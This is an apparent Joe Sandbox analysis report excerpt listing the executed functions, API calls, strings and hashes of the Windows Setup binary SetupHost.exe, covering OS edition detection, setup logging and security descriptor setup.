4e3c04 40209->40212 40210->40178 40226 4e388d 6 API calls 40211->40226 40212->40216 40227 4e3983 7 API calls __EH_prolog3 40212->40227 40216->40206 40218->40183 40219->40198 40220->40198 40221->40198 40222->40190 40223->40195 40224->40203 40225->40216 40226->40216 40227->40216 40228->40210 37693 4ed580 37694 4ed5db 37693->37694 37695 4ed596 37693->37695 37696 4f9d9c 6 API calls 37694->37696 37695->37694 37698 4f8ab5 186 API calls 37695->37698 37697 4ed5e3 37696->37697 37698->37694 39825 4fe3be 39826 4fe478 SetLastError 39825->39826 39827 4fe3d8 39825->39827 39830 4fe480 39826->39830 39827->39826 39828 4fe3e3 39827->39828 39829 4fe5fc 40 API calls 39828->39829 39831 4fe3ea 39829->39831 39831->39830 39832 4fe3f4 CreateFileW 39831->39832 39833 4fe454 GetLastError 39832->39833 39834 4fe412 DeviceIoControl 39832->39834 39837 4fe45c GetProcessHeap HeapFree SetLastError 39833->39837 39835 4fe43a GetLastError 39834->39835 39836 4fe444 39834->39836 39838 4fe44b CloseHandle 39835->39838 39836->39838 39837->39830 39838->39837

                                                                                                                        Executed Functions

                                                                                                                        Function 0053DE32 Relevance: 96.7, APIs: 27, Strings: 28, Instructions: 425registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 53de32-53df12 call 54f3e6 memset * 2 call 53e4a7 memset * 3 RtlGetVersion call 4f9ca1 7 53df26-53df48 call 53dc8e call 53dcf8 0->7 8 53df14 0->8 18 53e208-53e20f call 53ddca 7->18 19 53df4e-53df7c RegOpenKeyExW call 4f9d53 7->19 9 53df1a-53df21 call 4f9d84 8->9 15 53e432-53e476 call 4f9d9c call 4eee5d * 5 9->15 92 53e478-53e479 FreeLibrary 15->92 93 53e47f-53e48d 15->93 27 53e211-53e218 18->27 28 53e23e-53e26c RegOpenKeyExW 18->28 19->8 26 53df7e-53dfb1 RegQueryValueExW 19->26 30 53dfd3-53e00f RegQueryValueExW 26->30 31 53dfb3-53dfba 26->31 27->28 32 53e21a-53e22b 27->32 33 53e27a-53e27c 28->33 34 53e26e-53e274 RegCloseKey 28->34 37 53e015-53e051 RegQueryValueExW 30->37 38 53e0a9-53e0af 30->38 31->30 36 53dfbc-53dfce call 4e17c0 31->36 39 53e234 32->39 40 53e22d-53e232 32->40 41 53e27e-53e28b 33->41 42 53e28d-53e299 33->42 34->33 36->30 37->38 46 53e053-53e05a 37->46 49 53e0c3-53e0c5 38->49 50 53e0b1-53e0bd RegCloseKey 38->50 47 53e239 call 4e17c0 39->47 40->47 48 53e29a-53e2a3 41->48 42->48 56 53e0a0-53e0a3 46->56 57 53e05c-53e066 46->57 47->28 51 53e2b1-53e2b4 48->51 52 53e2a5-53e2af 48->52 54 53e0c7-53e0ce 49->54 55 53e0e6-53e0ea 49->55 50->49 60 53e2c2-53e2c5 51->60 61 53e2b6-53e2c0 51->61 59 53e2e2-53e2f0 52->59 54->55 63 53e0d0-53e0e4 call 4e17c0 54->63 64 53e15b-53e16a LoadLibraryW 55->64 65 53e0ec-53e0ee 55->65 56->38 57->56 66 53e068-53e072 57->66 75 53e2f2 59->75 76 53e2fc-53e32a call 54df14 59->76 71 53e2d3-53e2d6 60->71 72 53e2c7-53e2d1 60->72 61->59 63->64 67 53e1b0-53e203 GetLastError call 4e1d02 call 54086c GetLastError call 4f9d6c 64->67 68 53e16c-53e17c GetProcAddress 64->68 73 53e0f0-53e0f2 65->73 74 53e0f4-53e0f6 65->74 66->56 77 53e074-53e07b 66->77 67->9 68->67 78 53e17e-53e18b 68->78 71->59 81 53e2d8 71->81 72->59 82 53e0f7-53e155 SetLastError GetLastError call 4e1d02 call 54086c call 4f9d53 73->82 74->82 75->76 95 53e37e-53e3be GetLastError call 4e1d02 call 54086c 76->95 96 53e32c-53e354 CompareStringW 76->96 77->56 84 53e07d-53e09e call 4e17c0 77->84 107 53e18d-53e191 78->107 81->59 82->8 82->64 84->38 92->93 100 53e49b-53e4a6 call 54f3a4 93->100 101 53e48f-53e495 RegCloseKey 93->101 110 53e3c3-53e427 GetLastError call 4e1d02 call 54086c 95->110 103 53e356-53e359 96->103 104 53e35b-53e377 CompareStringW 96->104 101->100 103->110 104->110 111 53e379-53e37c 104->111 107->67 116 53e193-53e1ab call 4e17c0 GlobalFree 107->116 124 53e42c 110->124 111->110 116->28 124->15
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0053DE3C
                                                                                                                        • memset.MSVCRT ref: 0053DE59
                                                                                                                        • memset.MSVCRT ref: 0053DE6A
                                                                                                                          • Part of subcall function 0053E4A7: memset.MSVCRT ref: 0053E4D9
                                                                                                                          • Part of subcall function 0053E4A7: RtlGetVersion.NTDLL ref: 0053E4EE
                                                                                                                        • memset.MSVCRT ref: 0053DEBA
                                                                                                                        • memset.MSVCRT ref: 0053DECF
                                                                                                                        • memset.MSVCRT ref: 0053DEE4
                                                                                                                        • RtlGetVersion.NTDLL ref: 0053DEFD
                                                                                                                          • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
                                                                                                                          • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0053DF67
                                                                                                                        • RegQueryValueExW.KERNEL32(?,InstallationType,00000000,?,?,?), ref: 0053DFA9
                                                                                                                        • RegQueryValueExW.KERNEL32(?,EditionId,00000000,?,?,00000208), ref: 0053DFFE
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,DigitalProductId4,00000000,?,?,00000208), ref: 0053E041
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0053E0B7
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                          • Part of subcall function 004EEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,004FB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004EEE6B
                                                                                                                          • Part of subcall function 004EEE5D: HeapFree.KERNEL32(00000000), ref: 004EEE72
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,000004E1,base\ntsetup\conx\common\setuplib\src\osinfo.cpp,ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo,00000002,00000000), ref: 0053E479
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0053E495
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$QueryValue$CloseEventFreeHeapVersion$EnabledErrorH_prolog3_HandleLastLibraryModuleOpenProcessWrite
                                                                                                                        • String ID: %WINDOWS_LONG%$%hs: couldn't get host edition id$%hs: couldn't get host product name$BrandingFormatString$Client Workstation$Complete$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$Core$DigitalProductId4$EditionId$Failed to determine source edition type! Error: [0x%X]$HomeEdition$InstallationType$Professional$SOFTWARE\Microsoft\Sysprep$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Server Workstation$Source OS: Host SKU Info: Edition = '%s', Edition Type = '%s', Installation Type = '%s', Product Name = '%s', Arch = %s, StationType = %s, Stage type = %s$Staged Image$Unstaged Image$amd64$arm$arm64$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$unknown$winbrand.dll$x86
                                                                                                                        • API String ID: 579081697-1122241035
                                                                                                                        • Opcode ID: 4bc20007a4416171cfb4c8baa30878b532056fe7e9e7a8bf7dcd15a6392d78d7
                                                                                                                        • Instruction ID: 4431f2282cd72c501d0d3379483061b71a7eade416478cf5959e43d35e8fb077
                                                                                                                        • Opcode Fuzzy Hash: 4bc20007a4416171cfb4c8baa30878b532056fe7e9e7a8bf7dcd15a6392d78d7
                                                                                                                        • Instruction Fuzzy Hash: B9F1E475A00318ABDF209F50DC4AFAE7BB8BF95711F10019AF509A62D0DBB49E84CF56
                                                                                                                        Function 0053F60E Relevance: 91.7, APIs: 18, Strings: 34, Instructions: 704COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 125 53f60e-53f730 call 5501e0 memset * 8 call 54290c 130 53f736-53f73d call 53ed7d 125->130 131 53fbf5 125->131 137 53f73f-53f744 130->137 138 53f74e-53f76b call 5427a0 130->138 132 53fbf7-53fc10 call 54ea60 131->132 137->138 141 53f7a9-53f7b0 138->141 142 53f76d-53f776 GetLastError 138->142 145 53f7b2 141->145 146 53f7b8-53f7cd 141->146 143 53f7a1-53f7a3 142->143 144 53f778-53f79b 142->144 143->131 143->141 144->143 145->146 147 53f7d3 146->147 148 53fb9e-53fbaa call 541dd1 call 5445c1 146->148 149 53f7d9-53f7e8 147->149 162 53fbaf-53fbb9 148->162 152 53f7ea-53f806 call 53ecc6 149->152 153 53f808-53f81c GetWindowsDirectoryA 149->153 152->153 156 53f833-53fa48 call 4fe595 152->156 153->156 157 53f81e-53f82e call 53ec25 153->157 168 5400a4-5400b1 call 5400cc 156->168 169 53fa4e-53fa75 call 4fe595 156->169 157->156 162->149 164 53fbbf-53fbc5 162->164 166 53fbc7 164->166 167 53fbcd-53fbf3 164->167 166->167 167->131 174 5400b6-5400bb 168->174 169->168 175 53fa7b-53faa2 call 4fe595 169->175 174->132 175->168 179 53faa8-53facf call 4fe595 175->179 179->168 183 53fad5-53fafc call 4fe595 179->183 183->168 186 53fb02-53fb29 call 4fe595 183->186 186->168 189 53fb2f-53fb56 call 4fe595 186->189 189->168 192 53fb5c-53fb62 189->192 193 53fc7a-53fc87 192->193 194 53fb68-53fb79 192->194 195 53fca7-53fcae call 53f5a0 193->195 196 53fc89-53fc8f 193->196 197 53fc13 194->197 198 53fb7f-53fb96 call 4fe595 194->198 195->168 208 53fcb4-53fcc0 195->208 196->195 199 53fc91-53fca1 SetUnhandledExceptionFilter 196->199 201 53fc18-53fc27 ExpandEnvironmentStringsW 197->201 198->193 207 53fb9c 198->207 199->195 205 53fc46-53fc50 GetTempPathW 201->205 206 53fc29-53fc32 GetFileAttributesW 201->206 205->193 210 53fc52-53fc72 wcsrchr 205->210 206->205 209 53fc34-53fc44 call 4e1840 206->209 207->201 211 53fcc2-53fcc4 208->211 212 53fd10-53fd17 208->212 209->193 209->205 210->193 227 53fc74-53fc76 210->227 211->212 216 53fcc6-53fcf7 211->216 214 53fd67-53fd6e 212->214 215 53fd19-53fd1b 212->215 220 53fd70-53fd72 214->220 221 53fdb5-53fdce 214->221 215->214 219 53fd1d-53fd4e 215->219 236 53fcf9-53fcfb 216->236 239 53fd50-53fd52 219->239 220->221 225 53fd74-53fda0 220->225 223 53fdd0-53fdd2 221->223 224 53fe1e-53fe27 221->224 223->224 228 53fdd4-53fe09 223->228 230 53fe6a-53fe6e 224->230 231 53fe29-53fe2b 224->231 225->168 253 53fda6-53fdb0 225->253 227->193 228->168 255 53fe0f-53fe19 228->255 232 53fef4-53fefb 230->232 233 53fe74-53fe76 230->233 231->230 234 53fe2d-53fe53 231->234 240 53ff77-53ff7f 232->240 241 53fefd-53feff 232->241 233->232 237 53fe78-53fea4 233->237 234->168 265 53fe59-53fe68 234->265 236->168 242 53fd01-53fd0b 236->242 237->168 269 53feaa-53fedf 237->269 239->168 243 53fd58-53fd62 239->243 244 53ff81-53ffca GetCurrentProcessId 240->244 245 53ffd0-53ffdc 240->245 241->240 248 53ff01-53ff31 241->248 242->212 243->214 244->245 250 540044-54004b 245->250 251 53ffde-53fffc 245->251 248->168 272 53ff37-53ff63 248->272 258 54007d-540083 250->258 259 54004d-540053 250->259 251->250 277 53fffe-540032 GetLastError call 4e1d02 251->277 253->221 255->224 261 540085-54008a 258->261 262 54008c-540092 258->262 259->258 260 540055-540073 RtlAddVectoredExceptionHandler 259->260 260->258 267 540099-5400a2 261->267 262->168 268 540094-540096 262->268 265->230 267->168 268->267 269->168 284 53fee5-53feef 269->284 283 53ff65-53ff67 272->283 282 540037-54003f call 54086c 277->282 282->250 283->168 286 53ff6d 283->286 284->232 286->240
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053F693
                                                                                                                        • memset.MSVCRT ref: 0053F6A7
                                                                                                                        • memset.MSVCRT ref: 0053F6B6
                                                                                                                        • memset.MSVCRT ref: 0053F6C5
                                                                                                                        • memset.MSVCRT ref: 0053F6D4
                                                                                                                        • memset.MSVCRT ref: 0053F6E3
                                                                                                                        • memset.MSVCRT ref: 0053F6F5
                                                                                                                        • memset.MSVCRT ref: 0053F704
                                                                                                                          • Part of subcall function 0054290C: GetVersion.KERNEL32 ref: 0054294F
                                                                                                                          • Part of subcall function 0054290C: GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                          • Part of subcall function 0054290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                          • Part of subcall function 0054290C: memset.MSVCRT ref: 00542A87
                                                                                                                          • Part of subcall function 0054290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                          • Part of subcall function 0054290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                          • Part of subcall function 0054290C: FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetLastError.KERNEL32 ref: 0053F76D
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,000000FA), ref: 0053F814
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%WINDIR%\Minidump,C:\$Windows.~WS\Sources\Panther\,00000104), ref: 0053FC1F
                                                                                                                        • GetFileAttributesW.KERNEL32(C:\$Windows.~WS\Sources\Panther\), ref: 0053FC2A
                                                                                                                        • GetTempPathW.KERNEL32(00000104,C:\$Windows.~WS\Sources\Panther\), ref: 0053FC48
                                                                                                                        • wcsrchr.MSVCRT ref: 0053FC68
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0053F3E0), ref: 0053FC96
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0053FF81
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0054000B
                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL ref: 00540071
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$EnvironmentErrorExceptionExpandLastLibraryStrings$AddressAttributesCurrentDirectoryFileFilterFreeHandleHandlerLoadModulePathProcProcessTempUnhandledVectoredVersionWindows_vsnwprintfwcsrchr
                                                                                                                        • String ID: %S\%s$%WINDIR%\Minidump$%s\$C:\$Windows.~WS\Sources\Panther\$C:\$Windows.~WS\Sources\SetupHost.Exe$C:\$Windows.~WS\Sources\SetupHost.Exe$CONOUT$$Con$Err$Fil$Fun$Global\SetupLog$Global\WdsSetupLogInit$Msg$SACSetupAct$SACSetupErr$SetupLog$Sev$Uid$Unable to load global log filter.$WdsSetupLogInit$Windows Setup activity log$Windows Setup error log$c:\$debug.log$diagerr.xml$diagwrn.xml$onecore\base\ntsetup\panther\wdslog\setuplog.cpp$setupact.log$setuperr.log$setuplog.cfg$setuplog.xml$(T$T
                                                                                                                        • API String ID: 2056404476-188612845
                                                                                                                        • Opcode ID: 21f18d194f863474073e16eeb992050d1f04beb65b87e312ffbafff73a4dfbed
                                                                                                                        • Instruction ID: edafc7e28efcc399928d50abe3158deb10590324722d86bec21960e1022ef198
                                                                                                                        • Opcode Fuzzy Hash: 21f18d194f863474073e16eeb992050d1f04beb65b87e312ffbafff73a4dfbed
                                                                                                                        • Instruction Fuzzy Hash: 625271B1A003299BDB20CF15DC59BEABBB8BF58701F5040BAE949E3290D7749E84DF54
                                                                                                                        Function 00541F8C Relevance: 43.7, APIs: 29, Instructions: 216memorythreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                        • GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • GetTokenInformation.KERNELBASE(00552740,00000001(TokenIntegrityLevel),00000000,00000000,00000001,?,00000001,00552740,0000003C,005427B4), ref: 00542098
                                                                                                                        • GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 005420A6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000001,00552740,0000003C,005427B4), ref: 005420BA
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 005420C1
                                                                                                                        • GetTokenInformation.KERNELBASE(00552740,00000001(TokenIntegrityLevel),00000000,00000001,00000001,?,00000001,00552740,0000003C,005427B4), ref: 005420E1
                                                                                                                        • GetLengthSid.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 005420F1
                                                                                                                        • GetLengthSid.ADVAPI32(?,?,00000001,00552740,0000003C,005427B4), ref: 005420FC
                                                                                                                        • GetLengthSid.ADVAPI32(0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542107
                                                                                                                        • GetLengthSid.ADVAPI32(005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00542112
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542123
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054212A
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,?,00000002,?,00000001,00552740,0000003C,005427B4), ref: 00542143
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00542158
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 0054216D
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C0110000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542182
                                                                                                                        • EqualSid.ADVAPI32(?,00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542191
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,00000000,?,00000001,00552740,0000003C,005427B4), ref: 005421A5
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00552740,0000003C,005427B4), ref: 005421B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005421DF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005421E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InitializeProcess$AccessAllowedLengthToken$Allocate$AllocCurrentDescriptorErrorInformationLastOpenSecurityThread$DaclEqualFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 719363623-0
                                                                                                                        • Opcode ID: 9c991f97ae6db8255819a8cb4d5fb31933fd7f8bf7788a92158fbace2622a81a
                                                                                                                        • Instruction ID: 733550100dc9a87c81332aab9950dc50435ae4c842b5385b7a465ce4bb93a057
                                                                                                                        • Opcode Fuzzy Hash: 9c991f97ae6db8255819a8cb4d5fb31933fd7f8bf7788a92158fbace2622a81a
                                                                                                                        • Instruction Fuzzy Hash: B1612975A00318ABEB219FA6EC4DBEEBEB8FF18755F444068F605E21A0D7719905DF20
                                                                                                                        Function 0054D460 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 108libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0054D46A
                                                                                                                        • memset.MSVCRT ref: 0054D4A1
                                                                                                                        • RtlGetVersion.NTDLL ref: 0054D4BA
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo), ref: 0054D519
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0054D520
                                                                                                                        • GetLastError.KERNEL32 ref: 0054D52C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorH_prolog3_HandleLastModuleProcVersionmemset
                                                                                                                        • String ID: Client$GetProductInfo$InstallationType$Server$Server Core$Software\Microsoft\Windows NT\CurrentVersion$kernel32.dll
                                                                                                                        • API String ID: 1560655752-3879065230
                                                                                                                        • Opcode ID: 285c64e365c36c145b5c56e39e4c37c10a7d2a019a24f7cd24e00b0025ba6d79
                                                                                                                        • Instruction ID: 8c4be5ac1a8df71ddfb803cba97e97c73e9bb76e16e65baedf94d23564d656e6
                                                                                                                        • Opcode Fuzzy Hash: 285c64e365c36c145b5c56e39e4c37c10a7d2a019a24f7cd24e00b0025ba6d79
                                                                                                                        • Instruction Fuzzy Hash: 1A41B0709002299BCF24ABA59C587FD7EB4BB4931CF1005AAE905A6240DB389F80CF65
                                                                                                                        Function 004FE3BE Relevance: 13.6, APIs: 9, Instructions: 75memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 004FE47A
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,02000000,00000000), ref: 004FE405
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 004FE430
                                                                                                                        • GetLastError.KERNEL32 ref: 004FE43A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004FE44C
                                                                                                                        • GetLastError.KERNEL32 ref: 004FE454
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004FE45F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FE466
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 004FE46D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$CloseControlCreateDeviceFileFreeHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2742103690-0
                                                                                                                        • Opcode ID: 34d2478261f077f0030df3614f7cc3fedfa3e3420b9dcb882f11216ed9bf200d
                                                                                                                        • Instruction ID: e24e245654042e331efe7c22ebb0fb8aa18c81791df57b914e505d289a486668
                                                                                                                        • Opcode Fuzzy Hash: 34d2478261f077f0030df3614f7cc3fedfa3e3420b9dcb882f11216ed9bf200d
                                                                                                                        • Instruction Fuzzy Hash: DD11E471604308BBE7105BB6AC4CF7B7BBCDBC8717F14845AFA02D22A0D6744D05A629
                                                                                                                        Function 00501150 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 0050118B
                                                                                                                        • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 005011A0
                                                                                                                        • GetLastError.KERNEL32 ref: 005011AF
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 005011BA
                                                                                                                        • GetLastError.KERNEL32 ref: 005011C2
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 005011CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
